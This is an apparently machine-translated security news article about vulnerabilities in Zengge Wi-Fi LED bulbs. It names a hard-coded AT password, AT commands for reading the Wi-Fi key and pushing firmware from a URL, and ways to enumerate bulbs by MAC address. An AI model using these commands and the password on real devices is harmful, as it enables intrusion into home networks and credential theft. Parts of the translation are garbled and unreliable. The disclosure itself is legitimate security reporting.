Iot security: multiple security vulnerabilities in LED lights
Recently, a foreign security expert found that Zengge's Wi-Fi LED lamp has multiple security vulnerabilities.
ZENGGE is a high-tech company integrating LED Controller Product R & D, manufacturing, sales and engineering design, installation and service.
Wi-Fi LED lights are LED Bulbs connected by Wireless WIFI. Such lights can be used as routers, HTTP servers, HTTP proxy servers, and many other devices.
Working Principle
This LED light is controlled by an android application. It can be connected to the network, controlled locally, or remotely controlled through the network. By default, Internet control is disabled, which ensures security. The LED light has three ports: TCP port 80, TCP port 5577, and UDP port 48899. Port 80 is used to damage the webpage, control the lightbulb at Port 5577, and control the router at Port 48899.
The vro port allows you to perform any operation: refresh the firmware, act as a proxy, read the Wi-Fi password, and connect to different networks. However, this port is generally only connected to the Intranet. The command used to control the port is the name of the AT post-add command and optional parameter.
Although the LED lights do not use encryption algorithms when connected to the network, the user's permissions only control the light, so there is no big impact
Local Network Attacks
An attacker can use the AT command with a hard-coded password HF-A11ASSISTHREAD by sending UDP packets to port 48899.
Use the AT + UPURL command to refresh the firmware:
AT + UPURL = url, filename can use the following AT command to read the WIFI password: AT + WSSSIDAT + WSKEY
The AT + HTTPDT command and related HTTP command can make the LED light send requests to the firewall and NAT in the network according to the attacker's wishes, and play a role similar to the HTTP proxy.
Attackers can use the lightbulb in the same network to obtain the permission to use the remote control function. This vulnerability is different from the "Internet Remote Control" vulnerability. Once an attacker knows the MAC address of the lightbulb, the access permission cannot be revoked.
Wi-Fi attack
When the LED light is not successfully connected to the access point in STA mode, configuring the AT + MDCH function will enable it to return to the Wireless AP mode. The AT + MDCH function has the following configuration options:
1、off2、on – 1 minute3、auto – 10 minutes4、3-120 – minutes to reset
In most cases (unless otherwise configured), because the AP mode is enabled by default, attackers can connect to and execute arbitrary local attacks.
Risks exposed to the Internet
By scanning the LED light network, we found at least two management ports exposed on the Internet. If the LED light is connected to the Internet, attackers can perform proxy attacks at any location to gain access to the user's network. They can also use the MAC address of the router to physically locate users, search for it in the wightle database, use a known wireless name and password to connect to the same access point as the LED lamp, or use software to refresh the firmware to perform other attacks.
Remote control of Internet attacks
The LED lamp does not use the authentication mechanism. Therefore, if an attacker knows its MAC address and is set to receive commands from the Internet, the attacker can control the LED lamp.
The MAC address of the lamp is prefixed with ACCF23, and the last three bytes determine a device. Because MAC addresses are allocated sequentially, if an attacker identifies a MAC address, the scan range can be limited. Therefore, it takes a small amount of time for attackers to control the light bulb enabled with the remote control function.
However, Hue bulbs can automatically detect devices using source IP addresses to prevent such attacks.
Indirect Connection attack
When you search for remote settings for a mobile phone that has connected to an LED lamp, you will find a list of authorized devices for the lamp, including all the devices that have been authorized to connect. The API call is GetAuthUserDevice. The problem arises: attackers can obtain the device ID from the authorization list to control other LED lights.
Solution
Zengge tried to fix these vulnerabilities through obfuscation keys, but it was not successful. Later, the company released a new version, modified the device registration process, and added the server verification process. However, server verification is still not enabled.